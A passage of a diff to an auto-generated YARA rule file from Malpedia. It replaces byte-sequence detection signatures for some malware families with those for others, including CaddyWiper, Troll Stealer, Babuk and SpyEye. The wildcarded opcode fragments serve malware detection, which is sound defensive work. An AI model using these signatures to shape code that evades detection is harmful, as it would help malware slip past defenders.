-		$sequence_5 = { 3bc6 7505 b8???????? 6a05 68???????? 50 e8???????? }
-		$sequence_6 = { 0fb641ff 0fb6d2 3bc2 0f8794000000 8088e184061004 40 ebee }
-		$sequence_7 = { 56 8d4c2418 88442418 e8???????? 8b0d???????? 51 56 }
-		$sequence_8 = { c644242800 8b4508 89442410 8bf8 8d442410 897c2418 50 }
-		$sequence_9 = { 8b4c2410 8d0431 50 e8???????? 8b4c2414 83c404 03c8 }
+		$sequence_0 = { 4883ec30 48c7442420feffffff 48895c2448 488bfa 488bd9 e8???????? 488d05fe020200 }
+		$sequence_1 = { 48837f1810 7205 488b0f eb03 488bcf ff15???????? eb4f }
+		$sequence_2 = { 488bcf 664489bd88010000 4c897c2420 4489bdb0010000 }
+		$sequence_3 = { 418bfc 6690 bae8030000 488b4dc0 ff15???????? 8bf0 4c89642428 }
+		$sequence_4 = { 48837f1810 7203 488b3f 448bc9 4c8bc7 33d2 }
+		$sequence_5 = { 488b742438 488bc3 488b5c2430 4883c420 5f c3 488d0d7c200200 }
+		$sequence_6 = { e8???????? eb75 4584c0 745b 4883fa08 7355 4c89742440 }
+		$sequence_7 = { b8c0110000 e8???????? 482be0 48c74588feffffff 48899c2418120000 488b05???????? }
+		$sequence_8 = { 4c8bcf 488bd7 488d8d10010000 e8???????? 488b8d90000000 }
+		$sequence_9 = { 480f42d1 488d4c2428 e8???????? 488b4c2430 4c8b4c2428 4a8d040f 4885c9 }
 
 	condition:
-		7 of them and filesize < 893708
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE
+rule MALPEDIA_Win_Caddywiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24f4aee1-0c12-5135-acc3-79b59762efbf"
+		id = "a5109c69-dce6-5bdc-a837-95fd9e608c27"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hi_zor_rat_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.caddywiper_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "8af52d284dd3ab5b7dd25e47f9e41f3a65d45bdcdc9d0dd1ec6d75ccfe311424"
+		logic_hash = "e3d56965e8598d86c97b50c37aebd90c5841d385e5b67b4fcd4ffac110956cd1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126028,32 +126304,32 @@ rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8b40010000 57 8d55f0 52 8d8594f6ffff 50 }
-		$sequence_1 = { 8945f8 8945fc ff15???????? 33c9 83c404 }
-		$sequence_2 = { 8b7818 03705c c1e30e 8db43e515a5e26 }
-		$sequence_3 = { 897df8 0b75f8 0bdf 337014 335814 03f2 }
-		$sequence_4 = { 23df 0bde 03585c 8975fc 8b7018 }
-		$sequence_5 = { f3a5 66a5 682c010000 8d4320 }
-		$sequence_6 = { 8d45fc 50 6a06 68???????? 52 c745fc00000000 ff15???????? }
-		$sequence_7 = { 33c0 6683b44568ffffff0d 40 83f844 }
-		$sequence_8 = { 81c756b7c7e8 c1ef14 c1e30c 0bdf 897010 03f3 }
-		$sequence_9 = { c7458424003300 c7458838002200 c7458c00003300 c7459024002500 c745943f003900 c7459838000a00 c7459c04002300 }
+		$sequence_0 = { c6852bffffff50 c6852cffffff72 c6852dffffff69 c6852effffff76 }
+		$sequence_1 = { c68523ffffff77 c68524ffffff6e c68525ffffff65 c68526ffffff72 c68527ffffff73 c68528ffffff68 c68529ffffff69 }
+		$sequence_2 = { ff954cf7ffff 8985e0f1ffff 83bde0f1ffffff 7505 e9???????? }
+		$sequence_3 = { c645f26c c645f300 c645f400 c645f500 c645d043 }
+		$sequence_4 = { c645c06b c645c165 c645c26e c645c350 c645c472 }
+		$sequence_5 = { 50 8d8db4fbffff 51 e8???????? 83c408 89854cf7ffff }
+		$sequence_6 = { 8b4df0 51 e8???????? 83c404 8945e8 837de800 0f84dc000000 }
+		$sequence_7 = { e8???????? 83c408 89854cffffff c745fc00000000 c68538ffffff43 c68539ffffff6c c6853affffff6f }
+		$sequence_8 = { c6852dffffff69 c6852effffff76 c6852fffffff69 c68530ffffff6c c68531ffffff65 c68532ffffff67 c68533ffffff65 }
+		$sequence_9 = { c645eb00 c645ec65 c645ed00 c645ee6c }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 33792
 }
-rule MALPEDIA_Win_Dorshel_Auto : FILE
+rule MALPEDIA_Win_Troll_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "550d8628-f52a-56de-91a7-ece0c38b96fb"
+		id = "b3bc43a0-20cb-5f37-a32c-9a34ea4e289e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dorshel_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.troll_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.troll_stealer_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "364203df24c6a83e17731caab6caa244bb9a531055fdc65fef6d763de8c4fb40"
+		logic_hash = "1fcbf79446deea8c1ec8b5953d0db65f84994139955c1cee9bca8fc3f0d1ce3f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126067,32 +126343,32 @@ rule MALPEDIA_Win_Dorshel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 83ec0c 31c0 648b5030 8b520c 8b5214 }
-		$sequence_1 = { 8d7708 8b3f 33fb f3a4 5f }
-		$sequence_2 = { 03f8 84c0 75f6 81ff5e515e83 7408 81ff36cadb30 75da }
-		$sequence_3 = { 83c004 e2f9 58 54 50 }
-		$sequence_4 = { 51 8b0f 33cb 51 ff55f8 8b5df4 }
-		$sequence_5 = { 54 50 8b4f04 33cb 51 8b0f }
-		$sequence_6 = { ffd5 85c0 74cd 8b07 01c3 }
-		$sequence_7 = { ac c1cf0d 03f8 84c0 75f6 81ff5e515e83 7408 }
-		$sequence_8 = { 57 6800200000 53 56 68129689e2 ffd5 85c0 }
-		$sequence_9 = { 5f 8b4704 33c3 83c104 99 }
+		$sequence_0 = { 81f3fa726602 f9 f7d3 d1cb f9 4153 }
+		$sequence_1 = { 4080ff09 4584c0 4863d2 f5 41f7c05471e21e 4584d2 }
+		$sequence_2 = { 400f91c7 66f7d7 490fb7ff 9c 480fbffc 418f00 ffc7 }
+		$sequence_3 = { 4151 313424 6641ffc1 41b1aa 4159 4863f6 f8 }
+		$sequence_4 = { 4180fede 4d3bf8 05963b2855 d1c8 80fc60 f9 48f7c1f132aa0d }
+		$sequence_5 = { 490fb3e0 44311c24 4d0fa4c032 4523c6 4158 4d63db 443ac0 }
+		$sequence_6 = { 49c1c824 448ac6 66410fabd8 313424 4158 66453bea 4863f6 }
+		$sequence_7 = { c1e004 660fb6df 660fa3c3 23f2 b326 4863d8 }
+		$sequence_8 = { 6681cf754d 4981c006000000 66418928 66d3e7 4981ea04000000 413add 480fa3ef }
+		$sequence_9 = { 66410fbaf9e4 410fb3d9 488b6c25f8 41d2c9 4d1bc3 4889442500 4c8bcd }
 
 	condition:
-		7 of them and filesize < 24576
+		7 of them and filesize < 45868032
 }
-rule MALPEDIA_Elf_Persirai_Auto : FILE
+rule MALPEDIA_Win_Unidentified_107_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "996dcf89-95a6-5052-ad1f-80d616d26c39"
+		id = "81c12c66-8304-5991-b574-5a315c388de3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.persirai_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_107_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "c89a0c1c6fb24b2cd2b602725441f1c71ea63a845e8a02036d6cfd2667993400"
+		logic_hash = "c653c14e4c7ef56015dec3b1522bf0d3fe051f290ecd82f4142246fe6c534c52"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126106,32 +126382,32 @@ rule MALPEDIA_Elf_Persirai_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c420 6a00 6a0d 68???????? 8b442414 }
-		$sequence_1 = { 89542414 8a16 46 8d42d0 3c09 76e4 }
-		$sequence_2 = { c3 57 56 53 31ff 8b4c2414 }
-		$sequence_3 = { 83c410 31c0 85db 740a e8???????? 8918 83c8ff }
-		$sequence_4 = { e8???????? 83c418 56 57 e8???????? 59 }
-		$sequence_5 = { 8b400c e9???????? 8b4e28 898ddcdcffff 8b5e24 }
-		$sequence_6 = { 83c410 85db 7405 3b5f10 72e5 8b4654 }
-		$sequence_7 = { 8d50a9 09da eba9 8a06 3c39 8d50d0 7e10 }
-		$sequence_8 = { 83c41c c3 53 8b5a18 eb0d 3b5918 }
-		$sequence_9 = { 8d41be 3c16 770c 25ff000000 ff248560790508 0fbed2 }
+		$sequence_0 = { 4c09f2 4585c0 490f49d0 4829c2 4c8d3c0a 4889f1 }
+		$sequence_1 = { 75dc 4c89e9 4883c420 5b 5e 5f 415c }
+		$sequence_2 = { 85d2 0f8ea1feffff 488b35???????? 31db }
+		$sequence_3 = { 7e96 8b13 4883f80b 0f8f33010000 }
+		$sequence_4 = { 4883ec28 8b05???????? 89cf 4889d6 }
+		$sequence_5 = { 4c89442418 4c894c2420 4883ec64 48c7c12f398d13 e8???????? }
+		$sequence_6 = { 8916 4189d4 4c89c3 85d2 755c 8b05???????? 85c0 }
+		$sequence_7 = { e8???????? 4189c6 85c0 0f84f2000000 4183fc01 0f856e010000 e8???????? }
+		$sequence_8 = { 0f84e6000000 488b05???????? 488d1c9b 48c1e303 4801d8 }
+		$sequence_9 = { 8938 48897008 4c89e1 ff15???????? 488b05???????? }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 254976
 }
-rule MALPEDIA_Win_Mbrlock_Auto : FILE
+rule MALPEDIA_Win_Thanatos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc094c21-b137-5d7e-ad7a-b11c96748bb2"
+		id = "a5721dfd-b447-5b95-8938-1157e68dfcc1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mbrlock_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thanatos_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "491b9f4fb168bceb19b5cf7b6c98ee71ee5564cadbcb31d189925e8a478d4bf3"
+		logic_hash = "53b5f2fa82e8c7501726e7b2943f1eca40b261bf73b7a493f709f61c94b8f1bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126145,32 +126421,32 @@ rule MALPEDIA_Win_Mbrlock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7e26 8b4510 57 83c004 53 50 ff15???????? }
-		$sequence_1 = { 50 ff15???????? 8b0d???????? 8945fc eb25 81ff34080000 7c39 }
-		$sequence_2 = { 84c3 7521 8ad0 b980850110 0ad3 8815???????? }
-		$sequence_3 = { 0bc1 894de8 7519 68fc5a0110 6a02 684b030000 68d4580110 }
-		$sequence_4 = { 8965f0 8975ec 893e ff15???????? 50 8945e4 68a0620110 }
-		$sequence_5 = { e8???????? 8b442434 c744242000000000 83f803 0f87cb000000 ff248540504000 56 }
-		$sequence_6 = { 68d4580110 e8???????? 83c410 8b55c8 6a00 6a00 52 }
-		$sequence_7 = { 8b4508 c1f805 8d1c8500f74e00 8b4508 83e01f 8d34c0 }
-		$sequence_8 = { 68af010000 6898610110 e8???????? 83c410 8b45ec 85c0 7416 }
-		$sequence_9 = { c1e602 8932 5e b801000000 5b c21800 33c9 }
+		$sequence_0 = { 668945f8 a0???????? 8845fa 8d45f4 50 ff15???????? }
+		$sequence_1 = { 8d45f0 50 ff15???????? 8bf0 ba3c9a4d59 }
+		$sequence_2 = { 50 ff15???????? 8d45c8 8945e4 8d45e0 }
+		$sequence_3 = { 53 8d85e4fdffff 50 e8???????? 83f801 b9???????? }
+		$sequence_4 = { 884304 8d0c37 2bf1 8d43fb 03c6 8944241d c644241ce9 }
+		$sequence_5 = { 83c108 8b45fc 5f ba40000000 5e }
+		$sequence_6 = { 8985f0dfffff 3bc3 0f8541010000 85f6 }
+		$sequence_7 = { 8d45bd 6a00 50 c645bc00 e8???????? 83c418 e8???????? }
+		$sequence_8 = { b906000000 eb05 b907000000 8b55fc 668b044dc84f0210 8b4d10 52 }
+		$sequence_9 = { 50 c745f45c400110 e8???????? cc 55 8bec }
 
 	condition:
-		7 of them and filesize < 2031616
+		7 of them and filesize < 1810432
 }
-rule MALPEDIA_Win_Moure_Auto : FILE
+rule MALPEDIA_Win_Hazy_Load_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d5ea53f7-d6a1-5284-9152-98034607f388"
+		id = "fbfa1e78-dff1-53dc-80af-71732a4c81b4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moure_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hazy_load"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hazy_load_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "e394b210e6ac1eaa6569608ddb349d4dd1ae50231f20d0924074c460f1fa6782"
+		logic_hash = "fd77b624c32a8e3f12aae94d42471fe8468beed29de311ba6e72f1538f11b350"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126184,32 +126460,32 @@ rule MALPEDIA_Win_Moure_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3454 43 1558c950cb 0d487b0d4c 36a373801f1e }
-		$sequence_1 = { bf55602540 006b05 bc7d506700 0033 58 bf35b8bf55 58 }
-		$sequence_2 = { 8b35???????? 57 00d6 0075f0 894508 0075fc 00d6 }
-		$sequence_3 = { 51 51 8b0d???????? 56 33f6 85c9 7509 }
-		$sequence_4 = { 837dbc00 7436 0075bc 8d4ddc e8???????? a1???????? 3bc6 }
-		$sequence_5 = { 82a8a200b000c1 8b00 e100 9e d28bd3977e8d 98 }
-		$sequence_6 = { 68b0704000 007014 007010 e8???????? }
-		$sequence_7 = { 5e 53 43 c1c361 5b c9 51 }
-		$sequence_8 = { 8b01 83e03f 3c02 751c 8b4514 8b10 83e23f }
-		$sequence_9 = { 42 c3 874226 c58035b4fe70 5e }
+		$sequence_0 = { 418bcc 448d4205 ff15???????? 488bd8 }
+		$sequence_1 = { 488d0d70e70000 f6413820 74b7 33d2 418bc9 448d4202 }
+		$sequence_2 = { 418d4102 83f801 761e 498bc9 488d153bfb0000 83e13f 498bc1 }
+		$sequence_3 = { 4c8d05e3f8ffff 4889442428 4533c9 33d2 89442420 }
+		$sequence_4 = { 488d1588f4feff c1e803 89442448 448be0 89442440 85c0 0f84d3030000 }
+		$sequence_5 = { 483b0d???????? 7417 488d0570630100 483bc8 740b 83791000 7505 }
+		$sequence_6 = { 488d0d386a0100 488bc3 83e33f 48c1f806 48c1e306 }
+		$sequence_7 = { ff15???????? 41b810000000 488d542420 488bcb }
+		$sequence_8 = { 4883ec20 488d3d93690100 48393d???????? 742b }
+		$sequence_9 = { eb12 488d0d46fe0000 c7435006000000 48894b48 c6435400 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 315392
 }
-rule MALPEDIA_Win_Kuaibu8_Auto : FILE
+rule MALPEDIA_Win_Spyeye_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "feff23df-fba9-50da-bdd6-d56c077ee020"
+		id = "d7c62579-def8-5f0a-826a-88762a729bf5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kuaibu8_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spyeye_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "1c5187ee4041920ae10034915fbc8c0e2946de36b7825290c30788ee24d4d482"
+		logic_hash = "f4149a2d0558cdca789e55a3da096c9eb02a06e0cbb6c5f6412ffac38db590ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126223,32 +126499,32 @@ rule MALPEDIA_Win_Kuaibu8_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 58 8be5 5d c26400 55 }
-		$sequence_1 = { 0f84b2000000 6804000080 6a00 68???????? 6801000000 bb98010000 e8???????? }
-		$sequence_2 = { 7409 53 e8???????? 83c404 8b45c4 e9???????? 6802000080 }
-		$sequence_3 = { c745e400000000 b8???????? 8945e0 8d45e0 50 e8???????? 8945dc }
-		$sequence_4 = { 7d0d 56 e8???????? 33c0 5e 83c410 c3 }
-		$sequence_5 = { 5e 81c410010000 c3 8d442410 50 56 }
-		$sequence_6 = { 68???????? ff75d4 68???????? ff75f4 68???????? b905000000 e8???????? }
-		$sequence_7 = { 83c40c 8945e8 6802000080 6a00 6800000000 6a00 }
-		$sequence_8 = { ff75f4 68???????? 6800000000 6800000000 ff15???????? 90 90 }
-		$sequence_9 = { 8b5dec e8???????? 33c9 50 8d45f4 8bd8 58 }
+		$sequence_0 = { 81fbffffff7f 7509 56 57 e8???????? 8bd8 3bde }
+		$sequence_1 = { 740e 8965fc ff750c ff7508 ffd0 8b65fc c9 }
+		$sequence_2 = { 751b 57 6800000002 6a03 }
+		$sequence_3 = { 7414 8965fc ff7514 ff7510 }
+		$sequence_4 = { 50 57 e8???????? 8b5d14 33f6 3bde }
+		$sequence_5 = { 53 56 57 33ff 57 be80000000 56 }
+		$sequence_6 = { 56 57 e8???????? 57 8bf0 e8???????? 8bc6 }
+		$sequence_7 = { 6a03 57 6a01 56 ff750c }
+		$sequence_8 = { 740e 837dfcff 7408 ff75fc e8???????? 3bdf }
+		$sequence_9 = { 55 8bec 51 68b787554d }
 
 	condition:
-		7 of them and filesize < 737280
+		7 of them and filesize < 741376
 }
-rule MALPEDIA_Win_Naikon_Auto : FILE
+rule MALPEDIA_Win_Milum_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a0d1ff4-6123-5ada-8c4c-3a20072403a8"
+		id = "8311a048-c504-508b-a4e8-52a8a481b8b1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.naikon_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.milum_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "482df4e8a690a40d5dd089da89ade7d874a9359b42eeeb91d9707824c08e20e9"
+		logic_hash = "6c7c97a327f6ef555ead1a0969df80007fb8d016e702f68476c0459b28700b82"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126262,32 +126538,32 @@ rule MALPEDIA_Win_Naikon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc6 8088e130011008 40 3dff000000 }
-		$sequence_1 = { 3bc3 7c03 53 eb01 50 8b4dfc 8d043e }
-		$sequence_2 = { 8d450c 6a03 50 8bce e8???????? 8b06 }
-		$sequence_3 = { 8bf1 ff742410 e8???????? 85c0 753f 8d4e7c 8d4670 }
-		$sequence_4 = { a1???????? 682c010000 b9???????? 50 8d9500f0ffff }
-		$sequence_5 = { 50 8d85f8feffff 50 ffd7 894508 8b85a8fcffff }
-		$sequence_6 = { 8bce e8???????? 8b06 8b4e08 57 0fb60c01 }
-		$sequence_7 = { 8bd8 ffd7 5f 8bc3 }
-		$sequence_8 = { 0fbec3 8a80e8d10010 83e00f eb02 33c0 0fbe84c108d20010 }
-		$sequence_9 = { 8b85a8fcffff 83e010 3c10 7503 6a01 5e }
+		$sequence_0 = { 56 8d5db4 53 8b5dac 53 8b5da0 50 }
+		$sequence_1 = { 8b4608 8d80349e4700 fe08 803800 7f1c 8bce e8???????? }
+		$sequence_2 = { c6460165 e8???????? 5f 8be5 5d c3 8d4bff }
+		$sequence_3 = { c745fc01000000 8d7b0f 395dac 7524 6a10 68???????? 8d4db8 }
+		$sequence_4 = { 8d45f4 64a300000000 8965f0 8b7d08 33f6 8975ec 897708 }
+		$sequence_5 = { 7506 8b4b08 894b10 8b16 837a1000 0f8560fdffff }
+		$sequence_6 = { 8bcc 8965bc 6aff 53 8d45d4 897114 895910 }
+		$sequence_7 = { 7456 50 53 8d4dd0 e8???????? eb3d 8b35???????? }
+		$sequence_8 = { c645fc02 83c204 8955d0 8b4304 3bf8 736d 8b13 }
+		$sequence_9 = { 7446 83ec1c 8bfc 89a5ecfdffff 83ec1c 8bcc 89a5e8fdffff }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 1076224
 }
-rule MALPEDIA_Win_Agendacrypt_Auto : FILE
+rule MALPEDIA_Elf_Babuk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dc53611f-1b74-52ad-9b55-d5a83620a37c"
+		id = "8eba83d0-6c95-5d1f-85db-3750f26fdff6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.agendacrypt_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.babuk_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "d7e38346c9af348b4c2d13bd6ea77d0011438992fc08a00180dea033b3826496"
+		logic_hash = "a4e1d4252d61243f852bbd89e2ebf51566a3485791e9905d978089b8c49c4cb9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126301,32 +126577,32 @@ rule MALPEDIA_Win_Agendacrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75f0 e8???????? 83c404 837dec00 740f a1???????? 56 }
-		$sequence_1 = { c7430c01010000 c7430886f70d01 c74304092a8648 884b10 894330 c70302000000 89d8 }
-		$sequence_2 = { 89ce 83f002 0b410c 752f 807e3002 7539 807e2002 }
-		$sequence_3 = { 8bbc2494000000 83d700 83d200 030cf0 135cf004 8b4508 890cf0 }
-		$sequence_4 = { a9ffffff7f 7551 ff75f0 e8???????? 83c410 5e 5f }
-		$sequence_5 = { 74e7 8b4e08 8b09 50 ffd1 83c404 8b4e08 }
-		$sequence_6 = { 8d4cde08 29da 894c2420 89542418 8d0cd500000000 51 50 }
-		$sequence_7 = { e9???????? c68424c803000004 b104 be04000000 31db 31ff 80f904 }
-		$sequence_8 = { c745b410764100 8945b8 8d45ec c745bc00474100 8945c0 8d45a0 c745c440ba4100 }
-		$sequence_9 = { e9???????? 8b55e8 0f1f8000000000 837dcc00 741f 6a02 68???????? }
+		$sequence_0 = { 658b0d00000000 8b89fcffffff 3b6108 7678 83ec14 8b442418 8b4c241c }
+		$sequence_1 = { 8b4c2438 890f 8b542444 89570c 8b1d???????? 85db }
+		$sequence_2 = { e8???????? 8b44240c 89442410 8b4c2418 890c24 e8???????? 8b442420 }
+		$sequence_3 = { e8???????? 8b442438 8b4804 90 8b492c 894c2420 e8???????? }
+		$sequence_4 = { c3 658b1d00000000 8b9bfcffffff 8b5b18 8b5b70 8403 890424 }
+		$sequence_5 = { 01d9 8b9c24a8010000 8bbc243c030000 01fb 11cd 8b8c248c010000 8b9c2464020000 }
+		$sequence_6 = { 8b44244c 8b4c2440 31d2 eb06 8d5101 90 89f1 }
+		$sequence_7 = { 895328 8b9424b0000000 8b8c2490000000 01ca 33562c 89532c }
+		$sequence_8 = { 8b5a40 39d8 0f85360f0000 89bc2408020000 81c4dc010000 c3 89c7 }
+		$sequence_9 = { 8b4c2424 01ca 89942444050000 8b8c2490050000 c1e11a 898c2420050000 }
 
 	condition:
-		7 of them and filesize < 3340288
+		7 of them and filesize < 4186112
 }
-rule MALPEDIA_Win_Spora_Ransom_Auto : FILE
+rule MALPEDIA_Win_Liteduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d94c115-8898-5fd2-9400-bd1b65702971"
+		id = "0d5b03ab-c51a-5be5-8e11-3fd3c042290f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spora_ransom_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.liteduke_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "8cb28aa2ca756a794bdd2f8c19a9ebbdf2da0e5ca39f0f44ec247ce30af41008"
+		logic_hash = "7fa217ead580adfe5b357dd72935fa5df636ba1480b849cad849e2ead7958d39"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126340,32 +126616,32 @@ rule MALPEDIA_Win_Spora_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebe9 b005 ebe5 b006 ebe1 }
-		$sequence_1 = { 85c0 7436 03fb 83ff0c 72ec 33ff }
-		$sequence_2 = { f6c301 742c 6a3a 8d4641 668945f0 58 ff7510 }
-		$sequence_3 = { 75b4 8b7df4 57 ff15???????? ff75fc e8???????? }
-		$sequence_4 = { 740e 8b45fc 8b4010 0fb6f0 }
-		$sequence_5 = { 56 6a19 ff75f8 ff15???????? 85c0 7425 837dfc00 }
-		$sequence_6 = { ebf5 b002 ebf1 b003 ebed }
-		$sequence_7 = { 85c0 7466 56 57 bf00020000 }
-		$sequence_8 = { 8d440010 50 6a40 ffd3 8bf8 85ff 7416 }
-		$sequence_9 = { 8bf8 85ff 7416 ff36 }
+		$sequence_0 = { 8b4df8 e30b 0175f8 01f1 66c741fe0000 89f3 }
+		$sequence_1 = { ff7508 e8???????? a3???????? 014d08 }
+		$sequence_2 = { ff750c ff7508 e8???????? 85c0 750e 8b4508 ff30 }
+		$sequence_3 = { 0f31 a3???????? 58 5a c3 52 }
+		$sequence_4 = { ff7508 ff15???????? ff75fc ff15???????? 6a00 ff15???????? 5b }
+		$sequence_5 = { 83ec30 c745ec00000000 c745fc00000000 57 }
+		$sequence_6 = { b900010000 8dbd00fcffff f3a5 61 }
+		$sequence_7 = { f3a4 b000 aa 58 014508 e9???????? ff7508 }
+		$sequence_8 = { b801000000 c9 c20c00 55 89e5 6a00 }
+		$sequence_9 = { 5a 31c0 8a02 52 50 6a03 e8???????? }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 1171456
 }
-rule MALPEDIA_Win_Ondritols_Auto : FILE
